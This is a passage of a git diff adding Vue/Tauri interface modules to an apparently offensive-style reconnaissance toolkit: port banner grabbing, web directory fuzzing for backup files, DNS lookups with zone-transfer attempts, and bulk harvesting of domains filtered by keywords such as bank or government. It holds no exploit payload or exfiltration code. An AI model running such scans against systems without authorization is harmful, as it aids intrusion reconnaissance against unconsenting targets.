+.sb-hits { color: var(--valid); font-weight: 700; font-size: 11px; font-variant-numeric: tabular-nums; }
+.sb-hits.danger { color: var(--alert); }
+.sb-sub { color: var(--fg-ghost); font-size: 9px; flex-shrink: 0; }
+
+.sb-fill {
+  position: absolute;
+  bottom: 0;
+  left: 0;
+  height: 2px;
+  background: linear-gradient(90deg, var(--accent-dim), var(--accent));
+  transition: width 0.15s;
+}
+.sb-fill.hot { background: linear-gradient(90deg, #a82020, var(--alert)); }
+
+.summary {
+  display: flex;
+  gap: 6px;
+  align-items: center;
+  padding: 3px 8px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  font-size: 10px;
+  flex-wrap: wrap;
+  flex-shrink: 0;
+}
+.sum-head {
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  font-size: 10px;
+  margin-right: 4px;
+}
+.sum-total {
+  margin-left: auto;
+  color: var(--fg-dim);
+  font-size: 10px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+}
+
+@media (max-width: 520px) {
+  .stages { grid-template-columns: 1fr; }
+}
+</style>
diff --git a/src/components/modules/Banner.vue b/src/components/modules/Banner.vue
new file mode 100644
index 0000000..588070a
--- /dev/null
+++ b/src/components/modules/Banner.vue
@@ -0,0 +1,127 @@
+<script setup lang="ts">
+import { onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Prompt from "../Prompt.vue";
+import Terminal from "../Terminal.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface Hit {
+  port: number;
+  banner: string;
+  service: string;
+  version?: string;
+  bytes: number;
+}
+
+const host = ref("scanme.nmap.org");
+const portSpec = ref("21,22,23,25,80,110,143,443,445,465,587,993,995,1433,3306,3389,5432,5900,6379,8080,8443,9200,27017");
+const concurrency = ref(30);
+const timeoutMs = ref(4000);
+const running = ref(false);
+const hits = ref<Hit[]>([]);
+const progress = ref({ done: 0, total: 0 });
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+function parsePorts(s: string): number[] {
+  const out = new Set<number>();
+  for (const p of s.split(/[,\s]+/)) {
+    const t = p.trim();
+    if (t.includes("-")) {
+      const [a, b] = t.split("-").map(x => parseInt(x, 10));
+      if (!isNaN(a) && !isNaN(b)) for (let i = a; i <= b; i++) out.add(i);
+    } else {
+      const n = parseInt(t, 10);
+      if (!isNaN(n)) out.add(n);
+    }
+  }
+  return Array.from(out);
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  hits.value = [];
+  progress.value = { done: 0, total: 0 };
+  log.clear();
+
+  const ports = parsePorts(portSpec.value);
+  if (!ports.length) { log.err("no ports"); running.value = false; return; }
+
+  unlistens.push(await listen<string>("banner:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ done: number; total: number }>("banner:progress", (e) => { progress.value = e.payload; }));
+  unlistens.push(await listen<Hit>("banner:hit", (e) => {
+    const h = e.payload;
+    hits.value.push(h);
+    const ver = h.version ? ` :: ${h.version}` : "";
+    log.valid(`${String(h.port).padEnd(5)} [${h.service.padEnd(12)}]${ver}`);
+  }));
+
+  try {
+    await invoke("banner_grab", {
+      req: { host: host.value.trim(), ports, concurrency: concurrency.value, timeout_ms: timeoutMs.value },
+    });
+    log.ok(`banner grab done: ${hits.value.length} service(s) fingerprinted`);
+  } catch (e: any) { log.err(String(e)); }
+  finally { running.value = false; cleanup(); }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="host" v-model="host" placeholder="target.com or 1.2.3.4" />
+      <Prompt label="ports" v-model="portSpec" placeholder="22,80,443 or 1-1024" />
+      <div class="row">
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="300" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="500" max="15000" /></label>
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ grabbing... ]" : "> grab banners" }}</button>
+      </div>
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+    </div>
+
+    <div v-if="hits.length" class="bgrid">
+      <div v-for="h in hits" :key="h.port" class="b">
+        <div class="b-head">
+          <span class="b-port">{{ h.port }}</span>
+          <span class="b-svc">{{ h.service }}</span>
+          <span v-if="h.version" class="b-ver">{{ h.version }}</span>
+          <span class="b-bytes">{{ h.bytes }}b</span>
+        </div>
+        <pre class="b-banner">{{ h.banner.slice(0, 500) }}</pre>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="banner // service fingerprint" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.bgrid { display: grid; grid-template-columns: repeat(auto-fill, minmax(260px, 1fr)); gap: 6px; max-height: 280px; overflow-y: auto; }
+.b { background: var(--bg-panel); border: 1px solid var(--border); padding: 5px 8px; border-left: 2px solid var(--valid); }
+.b-head { display: flex; gap: 6px; align-items: center; font-size: 11px; margin-bottom: 3px; }
+.b-port { color: var(--alert); font-weight: 700; min-width: 44px; font-variant-numeric: tabular-nums; }
+.b-svc { color: var(--valid); font-weight: 700; text-transform: uppercase; letter-spacing: 0.1em; font-size: 10px; flex-shrink: 0; }
+.b-ver { color: var(--info); font-size: 10px; flex: 1; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; min-width: 0; }
+.b-bytes { color: var(--fg-ghost); font-size: 9px; font-variant-numeric: tabular-nums; }
+.b-banner {
+  background: var(--bg);
+  border: 1px solid var(--border);
+  padding: 4px 6px;
+  font-size: 10px;
+  color: var(--fg-dim);
+  white-space: pre-wrap;
+  word-break: break-all;
+  max-height: 100px;
+  overflow-y: auto;
+  margin: 0;
+  line-height: 1.4;
+}
+</style>
diff --git a/src/components/modules/DirFuzz.vue b/src/components/modules/DirFuzz.vue
new file mode 100644
index 0000000..29964af
--- /dev/null
+++ b/src/components/modules/DirFuzz.vue
@@ -0,0 +1,170 @@
+<script setup lang="ts">
+import { onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface DirHit {
+  url: string;
+  status: number;
+  size: number;
+  words: number;
+  lines: number;
+  redirect?: string;
+  title?: string;
+  content_type?: string;
+  time_ms: number;
+}
+
+const baseUrl = ref("https://example.com");
+const wordlist = ref("");
+const extensions = ref(".php,.html,.bak,.zip,.json,.txt");
+const acceptStatusStr = ref("200,201,204,301,302,307,308,401,403,405");
+const sizeMin = ref<number | null>(null);
+const sizeMax = ref<number | null>(null);
+const concurrency = ref(40);
+const timeoutMs = ref(5000);
+const followRedirects = ref(false);
+const recursive = ref(false);
+const recursionDepth = ref(2);
+const running = ref(false);
+const progress = ref({ done: 0 });
+const hits = ref<DirHit[]>([]);
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+async function loadDefault() {
+  try {
+    const words: string[] = await invoke("dirfuzz_common_wordlist");
+    wordlist.value = words.join("\n");
+  } catch (e: any) { log.err(String(e)); }
+}
+
+function statusKind(s: number): "valid" | "ok" | "warn" | "err" {
+  if (s >= 200 && s < 300) return "valid";
+  if (s >= 300 && s < 400) return "ok";
+  if (s >= 400 && s < 500) return "warn";
+  return "err";
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  hits.value = [];
+  progress.value = { done: 0 };
+  log.clear();
+
+  const words = wordlist.value.split(/[\s,\n]+/).map(s => s.trim()).filter(Boolean);
+  const exts = extensions.value.split(/[,\s]+/).map(s => s.trim()).filter(Boolean);
+  const statuses = acceptStatusStr.value.split(/[,\s]+/).map(s => parseInt(s, 10)).filter(n => !isNaN(n));
+
+  log.info(`target: ${baseUrl.value}`);
+  log.info(`paths: ${words.length} × ${exts.length + 1} (incl. plain) = ${words.length * (exts.length + 1)} tests per level`);
+
+  unlistens.push(await listen<string>("dirfuzz:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ done: number }>("dirfuzz:progress", (e) => { progress.value = e.payload; }));
+  unlistens.push(await listen<DirHit>("dirfuzz:hit", (e) => {
+    const h = e.payload;
+    hits.value.push(h);
+    const redir = h.redirect ? ` → ${h.redirect}` : "";
+    const title = h.title ? ` "${h.title.slice(0, 40)}"` : "";
+    const line = `${String(h.status).padEnd(4)} ${h.size.toString().padStart(7)}b ${h.url}${redir}${title}`;
+    (log as any)[statusKind(h.status)](line);
+  }));
+
+  try {
+    await invoke("dirfuzz_run", {
+      req: {
+        base_url: baseUrl.value.trim(),
+        wordlist: words,
+        extensions: exts,
+        accept_status: statuses,
+        size_min: sizeMin.value,
+        size_max: sizeMax.value,
+        concurrency: concurrency.value,
+        timeout_ms: timeoutMs.value,
+        follow_redirects: followRedirects.value,
+        recursive: recursive.value,
+        recursion_depth: recursionDepth.value,
+        headers: {},
+        user_agent: null,
+      },
+    });
+    log.ok(`fuzz done: ${hits.value.length} hits`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+
+onMounted(loadDefault);
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="base url" v-model="baseUrl" placeholder="https://target.com" />
+
+      <details class="adv">
+        <summary>wordlist · {{ wordlist.split(/\s+/).filter(Boolean).length }} paths</summary>
+        <textarea class="term-input" v-model="wordlist" rows="4" spellcheck="false" placeholder="one path per line" />
+      </details>
+
+      <div class="row">
+        <label class="mini wide"><span>ext</span><input v-model="extensions" placeholder=".php,.bak,.zip" /></label>
+        <label class="mini wide"><span>status</span><input v-model="acceptStatusStr" placeholder="200,403" /></label>
+      </div>
+
+      <div class="row">
+        <label class="mini"><span>size≥</span><input v-model.number="sizeMin" type="number" placeholder="min" /></label>
+        <label class="mini"><span>size≤</span><input v-model.number="sizeMax" type="number" placeholder="max" /></label>
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="300" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="500" max="30000" /></label>
+      </div>
+
+      <div class="row">
+        <label class="toggle"><input type="checkbox" v-model="followRedirects" /><span>follow</span></label>
+        <label class="toggle"><input type="checkbox" v-model="recursive" /><span>recursive</span></label>
+        <label v-if="recursive" class="mini"><span>depth</span><input v-model.number="recursionDepth" type="number" min="1" max="5" /></label>
+      </div>
+
+      <div class="row">
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ fuzzing... ]" : "> fuzz" }}</button>
+      </div>
+
+      <div v-if="running" class="scan-stat">
+        <span>seen {{ progress.done }}</span>
+        <span class="sep">│</span>
+        <span>hits {{ hits.length }}</span>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="dir-fuzz // content discovery" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.adv { border: 1px solid var(--border); background: var(--bg-panel); padding: 4px 8px; }
+.adv summary { cursor: pointer; font-size: 10px; color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; padding: 2px 0; }
+.adv summary:hover { color: var(--fg); }
+.adv > *:not(summary) { margin-top: 6px; }
+
+.scan-stat {
+  display: flex;
+  gap: 8px;
+  padding: 4px 8px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  font-size: 11px;
+  color: var(--fg-dim);
+  font-variant-numeric: tabular-nums;
+}
+.scan-stat .sep { color: var(--fg-ghost); }
+</style>
diff --git a/src/components/modules/DnsTools.vue b/src/components/modules/DnsTools.vue
new file mode 100644
index 0000000..0d98775
--- /dev/null
+++ b/src/components/modules/DnsTools.vue
@@ -0,0 +1,99 @@
+<script setup lang="ts">
+import { ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import Prompt from "../Prompt.vue";
+import Terminal from "../Terminal.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface DnsRecord { rtype: string; values: string[]; }
+interface Axfr { success: boolean; nameserver: string; records_dumped: string[]; error?: string; }
+interface Report {
+  domain: string;
+  records: DnsRecord[];
+  axfr?: Axfr;
+  dnssec: { dnskey_count: number; has_dnssec: boolean };
+  errors: string[];
+}
+
+const domain = ref("example.com");
+const resolver = ref("");
+const tryAxfr = ref(false);
+const running = ref(false);
+const report = ref<Report | null>(null);
+const log = useTerminal();
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  log.clear();
+  report.value = null;
+  try {
+    report.value = await invoke<Report>("dns_query", {
+      req: {
+        domain: domain.value.trim(),
+        resolver: resolver.value.trim() || null,
+        types: null,
+        try_axfr: tryAxfr.value,
+      },
+    });
+    log.ok(`${report.value.records.reduce((a, b) => a + b.values.length, 0)} records resolved`);
+    if (report.value.dnssec.has_dnssec) log.valid(`DNSSEC: ${report.value.dnssec.dnskey_count} DNSKEY record(s)`);
+    else log.dim("DNSSEC: none");
+    if (report.value.axfr) {
+      if (report.value.axfr.success) log.hit(`AXFR SUCCESS on ${report.value.axfr.nameserver} — ${report.value.axfr.records_dumped.length} records leaked`);
+      else log.warn(`AXFR refused: ${report.value.axfr.error ?? "unknown"}`);
+    }
+    for (const e of report.value.errors) log.warn(e);
+  } catch (e: any) { log.err(String(e)); }
+  finally { running.value = false; }
+}
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="domain" v-model="domain" placeholder="example.com" />
+      <Prompt label="resolver" v-model="resolver" placeholder="1.1.1.1, 8.8.8.8, internal-dns.corp (blank = cloudflare)" />
+      <div class="row">
+        <label class="toggle"><input type="checkbox" v-model="tryAxfr" /><span>try zone transfer (AXFR)</span></label>
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ querying... ]" : "> resolve" }}</button>
+      </div>
+    </div>
+
+    <div v-if="report" class="rec-grid">
+      <div v-for="r in report.records" :key="r.rtype" class="rec">
+        <div class="rec-head">{{ r.rtype }} <span class="rec-count">×{{ r.values.length }}</span></div>
+        <div v-for="v in r.values" :key="v" class="rec-val">{{ v }}</div>
+      </div>
+      <div class="rec" :class="{ ok: report.dnssec.has_dnssec, miss: !report.dnssec.has_dnssec }">
+        <div class="rec-head">DNSSEC</div>
+        <div class="rec-val">{{ report.dnssec.has_dnssec ? `${report.dnssec.dnskey_count} DNSKEY` : "not signed" }}</div>
+      </div>
+      <div v-if="report.axfr" class="rec" :class="{ hit: report.axfr.success }">
+        <div class="rec-head">AXFR</div>
+        <div v-if="report.axfr.success" class="rec-val">
+          LEAKED {{ report.axfr.records_dumped.length }} records
+          <div class="axfr-list">
+            <div v-for="n in report.axfr.records_dumped.slice(0, 20)" :key="n">» {{ n }}</div>
+            <div v-if="report.axfr.records_dumped.length > 20" class="rec-val">... +{{ report.axfr.records_dumped.length - 20 }} more</div>
+          </div>
+        </div>
+        <div v-else class="rec-val">refused / {{ report.axfr.error }}</div>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="dns // recon" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.rec-grid { display: grid; grid-template-columns: repeat(auto-fill, minmax(220px, 1fr)); gap: 6px; }
+.rec { background: var(--bg-panel); border: 1px solid var(--border); padding: 6px 8px; border-left: 2px solid var(--border-hot); }
+.rec.hit { border-left-color: var(--alert); background: rgba(255, 47, 74, 0.05); }
+.rec.ok { border-left-color: var(--valid); }
+.rec.miss { border-left-color: var(--warn); }
+.rec-head { font-size: 10px; color: var(--alert); font-weight: 700; text-transform: uppercase; letter-spacing: 0.15em; margin-bottom: 3px; }
+.rec-count { color: var(--fg-dim); font-weight: 400; }
+.rec-val { color: var(--fg); font-size: 11px; word-break: break-all; padding: 1px 0; }
+.axfr-list { max-height: 160px; overflow-y: auto; margin-top: 4px; font-size: 10px; color: var(--fg-dim); }
+</style>
diff --git a/src/components/modules/DomainGrabber.vue b/src/components/modules/DomainGrabber.vue
new file mode 100644
index 0000000..6bcaa1e
--- /dev/null
+++ b/src/components/modules/DomainGrabber.vue
@@ -0,0 +1,313 @@
+<script setup lang="ts">
+import { computed, onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface IanaTld { tld: string; kind: string; sponsor: string; }
+interface Hit { domain: string; source: string; }
+interface SourceStat { source: string; count: number; error?: string | null; took_ms: number; }
+
+const tld = ref("id");
+const keyword = ref("");
+const apexOnly = ref(true);
+const maxPerSource = ref(500);
+const timeoutMs = ref(30000);
+
+// wordlists default OFF (slow) — user opt-in via UI
+const sWordlistId = ref(false);
+const sWordlistIdFull = ref(false);
+const sWordlistEn = ref(false);
+const sWordlistSubs = ref(false);
+const wordlistConcurrency = ref(150);
+const wordlistInfo = ref<Record<string, { name: string; count: number }>>({});
+const wlProgress = ref<Record<string, { done: number; total: number }>>({});
+
+const running = ref(false);
+const hits = ref<Hit[]>([]);
+const stats = ref<SourceStat[]>([]);
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+// IANA TLD list
+const ianaList = ref<IanaTld[]>([]);
+const ianaLoading = ref(false);
+const ianaKindFilter = ref<"all" | "generic" | "country-code" | "sponsored" | "generic-restricted">("all");
+const ianaSearch = ref("");
+
+const filteredIana = computed(() => {
+  let list = ianaList.value;
+  if (ianaKindFilter.value !== "all") list = list.filter(t => t.kind === ianaKindFilter.value);
+  const q = ianaSearch.value.toLowerCase().trim();
+  if (q) list = list.filter(t => t.tld.includes(q) || t.sponsor.toLowerCase().includes(q));
+  return list.slice(0, 200);
+});
+
+async function loadIana() {
+  if (ianaLoading.value) return;
+  ianaLoading.value = true;
+  log.dim("fetching IANA root database...");
+  try {
+    ianaList.value = await invoke<IanaTld[]>("iana_tld_list");
+    log.ok(`IANA loaded: ${ianaList.value.length} TLDs`);
+  } catch (e: any) {
+    log.err(`iana fetch failed: ${e}`);
+  } finally {
+    ianaLoading.value = false;
+  }
+}
+
+function pickTld(t: IanaTld) {
+  tld.value = t.tld.replace(/^\./, "");
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  hits.value = [];
+  stats.value = [];
+  log.clear();
+
+  // passive sources always run — user doesn't pick
+  const sources: string[] = ["crtsh", "commoncrawl", "rapiddns", "hackertarget", "certspotter"];
+  if (sWordlistId.value) sources.push("wordlist-id");
+  if (sWordlistIdFull.value) sources.push("wordlist-id-full");
+  if (sWordlistEn.value) sources.push("wordlist-en");
+  if (sWordlistSubs.value) sources.push("wordlist-subs");
+  if (!sources.length) { log.err("pick at least one source"); running.value = false; return; }
+
+  log.info(`tld: .${tld.value.replace(/^\./, "")}${keyword.value ? ` /keyword=${keyword.value}` : ""}`);
+  log.info(`apex=${apexOnly.value} | max=${maxPerSource.value}`);
+
+  unlistens.push(await listen<string>("grab:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ source: string; done: number; total: number }>("grab:wl-progress", (e) => {
+    wlProgress.value[e.payload.source] = { done: e.payload.done, total: e.payload.total };
+  }));
+  unlistens.push(await listen<SourceStat>("grab:source", (e) => {
+    // track internally for potential future use, but don't surface in UI/log
+    stats.value.push(e.payload);
+  }));
+  unlistens.push(await listen<Hit>("grab:hit", (e) => {
+    const h = e.payload;
+    hits.value.push(h);
+    // log domain only — source info hidden from user
+    log.valid(h.domain);
+  }));
+
+  try {
+    await invoke("domain_grab", {
+      req: {
+        tld: tld.value,
+        keyword: keyword.value || null,
+        sources,
+        max_per_source: maxPerSource.value,
+        apex_only: apexOnly.value,
+        timeout_ms: timeoutMs.value,
+        wordlist_concurrency: wordlistConcurrency.value,
+      },
+    });
+    log.ok(`grab complete: ${hits.value.length} unique domains`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+
+async function copyAll() {
+  const txt = hits.value.map(h => h.domain).join("\n");
+  try { await navigator.clipboard.writeText(txt); log.dim("copied to clipboard"); } catch {}
+}
+
+function downloadTxt() {
+  const txt = hits.value.map(h => h.domain).join("\n");
+  const blob = new Blob([txt], { type: "text/plain" });
+  const url = URL.createObjectURL(blob);
+  const a = document.createElement("a");
+  a.href = url;
+  a.download = `domains-${tld.value}-${Date.now()}.txt`;
+  a.click();
+  URL.revokeObjectURL(url);
+}
+
+onMounted(async () => {
+  const cached = localStorage.getItem("grab:iana");
+  if (cached) {
+    try { ianaList.value = JSON.parse(cached); } catch {}
+  }
+  try {
+    wordlistInfo.value = await invoke("wordlist_info");
+  } catch {}
+});
+
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <div class="row">
+        <label class="mini wide">
+          <span>TLD</span>
+          <input v-model="tld" placeholder="id, com, org, co.uk, gov.uk..." />
+        </label>
+      </div>
+
+      <details class="adv" :open="!ianaList.length">
+        <summary>iana tld catalog · {{ ianaList.length || "not loaded" }}</summary>
+        <div class="row">
+          <button class="btn-ghost" :disabled="ianaLoading" @click="loadIana">
+            {{ ianaLoading ? "loading..." : (ianaList.length ? "reload" : "load from iana.org") }}
+          </button>
+          <label class="mini wide"><span>search</span><input v-model="ianaSearch" placeholder="gov, bank, id..." /></label>
+        </div>
+        <div class="row">
+          <label class="toggle"><input type="radio" value="all" v-model="ianaKindFilter" /><span>all</span></label>
+          <label class="toggle"><input type="radio" value="generic" v-model="ianaKindFilter" /><span>generic</span></label>
+          <label class="toggle"><input type="radio" value="country-code" v-model="ianaKindFilter" /><span>ccTLD</span></label>
+          <label class="toggle"><input type="radio" value="sponsored" v-model="ianaKindFilter" /><span>sponsored</span></label>
+        </div>
+        <div v-if="filteredIana.length" class="iana-grid">
+          <button v-for="t in filteredIana" :key="t.tld" class="iana-chip" :class="`k-${t.kind.split('-')[0]}`" @click="pickTld(t)" :title="t.sponsor">
+            {{ t.tld }}
+          </button>
+        </div>
+      </details>
+
+      <Prompt label="keyword" v-model="keyword" placeholder="optional: bank, gov, pemerintah... (empty = all)" />
+
+      <details class="adv">
+        <summary>wordlist brute · dns + http alive verify</summary>
+        <div class="row">
+          <label class="toggle"><input type="checkbox" v-model="sWordlistId" /><span>id-common ({{ wordlistInfo['id-kompas']?.count ?? 0 }})</span></label>
+          <label class="toggle"><input type="checkbox" v-model="sWordlistIdFull" /><span>id-full ({{ wordlistInfo['id-kbbi']?.count ?? 0 }})</span></label>
+          <label class="toggle"><input type="checkbox" v-model="sWordlistEn" /><span>en-common ({{ wordlistInfo['en-common']?.count ?? 0 }})</span></label>
+          <label class="toggle"><input type="checkbox" v-model="sWordlistSubs" /><span>subs-top5k ({{ wordlistInfo['subs-top5k']?.count ?? 0 }})</span></label>
+        </div>
+        <div class="row">
+          <label class="mini"><span>dns-conc</span><input v-model.number="wordlistConcurrency" type="number" min="10" max="500" /></label>
+          <span class="wl-hint">
+            patterns: <code>w.tld</code> <code>www.w.tld</code> · keyword adds <code>w-k.tld</code> <code>k-w.tld</code> <code>www.w.k.tld</code>
+          </span>
+        </div>
+      </details>
+
+      <div class="row">
+        <label class="toggle"><input type="checkbox" v-model="apexOnly" /><span>apex only</span></label>
+      </div>
+
+      <div class="row">
+        <label class="mini"><span>max/src</span><input v-model.number="maxPerSource" type="number" min="50" max="10000" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="5000" max="120000" /></label>
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ grabbing... ]" : "> grab domains" }}</button>
+      </div>
+
+      <div v-if="Object.keys(wlProgress).length" class="summary-line">
+        <span v-for="(p, src) in wlProgress" :key="src" class="sum-piece wl">
+          {{ String(src).replace('wordlist-', '') }} {{ p.done }}/{{ p.total }}
+        </span>
+      </div>
+    </div>
+
+    <div v-if="hits.length" class="results">
+      <div class="res-head">
+        <span class="res-count">{{ hits.length }} unique</span>
+        <button class="btn-ghost tiny" @click="copyAll">copy all</button>
+        <button class="btn-ghost tiny" @click="downloadTxt">download .txt</button>
+      </div>
+      <textarea
+        class="term-input res-box"
+        readonly
+        :value="hits.map(h => h.domain).join('\n')"
+        rows="8"
+        spellcheck="false"
+      />
+    </div>
+
+    <Terminal :lines="log.lines.value" title="domain-grab // bulk harvest" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.adv { border: 1px solid var(--border); background: var(--bg-panel); padding: 4px 8px; }
+.adv summary { cursor: pointer; font-size: 10px; color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; padding: 2px 0; }
+.adv summary:hover { color: var(--fg); }
+.adv > *:not(summary) { margin-top: 6px; }
+
+.iana-grid {
+  display: flex;
+  flex-wrap: wrap;
+  gap: 3px;
+  max-height: 180px;
+  overflow-y: auto;
+  padding: 4px;
+  background: var(--bg);
+  border: 1px solid var(--border);
+}
+.iana-chip {
+  padding: 2px 6px;
+  font-size: 10px;
+  color: var(--fg);
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  cursor: pointer;
+  white-space: nowrap;
+  transition: all 0.1s;
+}
+.iana-chip:hover { border-color: var(--alert); color: var(--alert); }
+.k-generic { border-left: 2px solid var(--info); }
+.k-country { border-left: 2px solid var(--warn); }
+.k-sponsored { border-left: 2px solid var(--valid); }
+.k-infrastructure { border-left: 2px solid var(--fg-ghost); }
+
+.wl-hint {
+  color: var(--fg-dim);
+  font-size: 10px;
+  font-style: italic;
+  align-self: center;
+}
+.wl-hint code { color: var(--info); background: var(--bg); padding: 0 3px; border: 1px solid var(--border); font-style: normal; margin: 0 2px; }
+
+.hint-box {
+  padding: 6px 10px;
+  border: 1px solid rgba(127, 179, 213, 0.3);
+  background: rgba(127, 179, 213, 0.05);
+  color: var(--fg-dim);
+  font-size: 10px;
+  line-height: 1.6;
+}
+.hint-box b { color: var(--info); text-transform: uppercase; letter-spacing: 0.1em; font-size: 10px; }
+.hint-box code { color: var(--valid); background: var(--bg); padding: 0 4px; border: 1px solid var(--border); font-size: 10px; margin: 0 2px; }
+.hint-box ul { margin: 4px 0 0 16px; padding: 0; }
+.hint-box li { padding: 1px 0; }
+
+.summary-line {
+  display: flex;
+  gap: 6px;
+  align-items: center;
+  padding: 4px 8px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  font-size: 10px;
+  flex-wrap: wrap;
+}
+.sum-piece {
+  padding: 1px 6px;
+  border: 1px solid var(--border-hot);
+  letter-spacing: 0.05em;
+  text-transform: uppercase;
+}
+.sum-piece.ok { color: var(--valid); border-color: var(--valid); }
+.sum-piece.wl { color: var(--info); border-color: var(--info); font-variant-numeric: tabular-nums; text-transform: none; }
+
+.results { display: flex; flex-direction: column; gap: 4px; background: var(--bg-panel); border: 1px solid var(--border); padding: 6px 8px; }
+.res-head { display: flex; gap: 6px; align-items: center; }
+.res-count { color: var(--valid); font-weight: 700; font-size: 11px; flex: 1; }
+.btn-ghost.tiny { padding: 1px 8px; font-size: 9px; }
+.res-box { font-size: 11px; color: var(--valid); background: var(--bg); }
+</style>
diff --git a/src/components/modules/Encoder.vue b/src/components/modules/Encoder.vue
new file mode 100644
index 0000000..a53b084
--- /dev/null
+++ b/src/components/modules/Encoder.vue
@@ -0,0 +1,253 @@
+<script setup lang="ts">
+import { ref } from "vue";
+
+type Op =
+  | "b64-enc" | "b64-dec" | "url-enc" | "url-dec"
+  | "hex-enc" | "hex-dec" | "html-enc" | "html-dec"
+  | "unicode-enc" | "unicode-dec" | "rot13" | "reverse"
+  | "upper" | "lower" | "morse-enc" | "morse-dec"
+  | "jwt-dec";
+
+interface Step { op: Op; label: string; }
+
+const input = ref("");
+const output = ref("");
+const pipeline = ref<Step[]>([]);
+const error = ref("");
+const toast = ref("");
+
+const OPS: { id: Op; label: string; group: string }[] = [
+  { id: "b64-enc",     label: "base64 encode",  group: "base64" },
+  { id: "b64-dec",     label: "base64 decode",  group: "base64" },
+  { id: "url-enc",     label: "url encode",     group: "url" },
+  { id: "url-dec",     label: "url decode",     group: "url" },
+  { id: "hex-enc",     label: "hex encode",     group: "hex" },
+  { id: "hex-dec",     label: "hex decode",     group: "hex" },
+  { id: "html-enc",    label: "html encode",    group: "html" },
+  { id: "html-dec",    label: "html decode",    group: "html" },
+  { id: "unicode-enc", label: "\\uXXXX encode", group: "unicode" },
+  { id: "unicode-dec", label: "\\uXXXX decode", group: "unicode" },
+  { id: "rot13",       label: "rot13",          group: "classic" },
+  { id: "reverse",     label: "reverse",        group: "classic" },
+  { id: "upper",       label: "UPPERCASE",      group: "classic" },
+  { id: "lower",       label: "lowercase",      group: "classic" },
+  { id: "morse-enc",   label: "morse encode",   group: "classic" },
+  { id: "morse-dec",   label: "morse decode",   group: "classic" },
+  { id: "jwt-dec",     label: "jwt decode",     group: "jwt" },
+];
+
+const MORSE: Record<string, string> = {
+  A:".-",B:"-...",C:"-.-.",D:"-..",E:".",F:"..-.",G:"--.",H:"....",I:"..",J:".---",K:"-.-",L:".-..",
+  M:"--",N:"-.",O:"---",P:".--.",Q:"--.-",R:".-.",S:"...",T:"-",U:"..-",V:"...-",W:".--",X:"-..-",
+  Y:"-.--",Z:"--..","0":"-----","1":".----","2":"..---","3":"...--","4":"....-","5":".....","6":"-....",
+  "7":"--...","8":"---..","9":"----.",".":".-.-.-",",":"--..--","?":"..--..","!":"-.-.--","@":".--.-.",
+  " ":"/",
+};
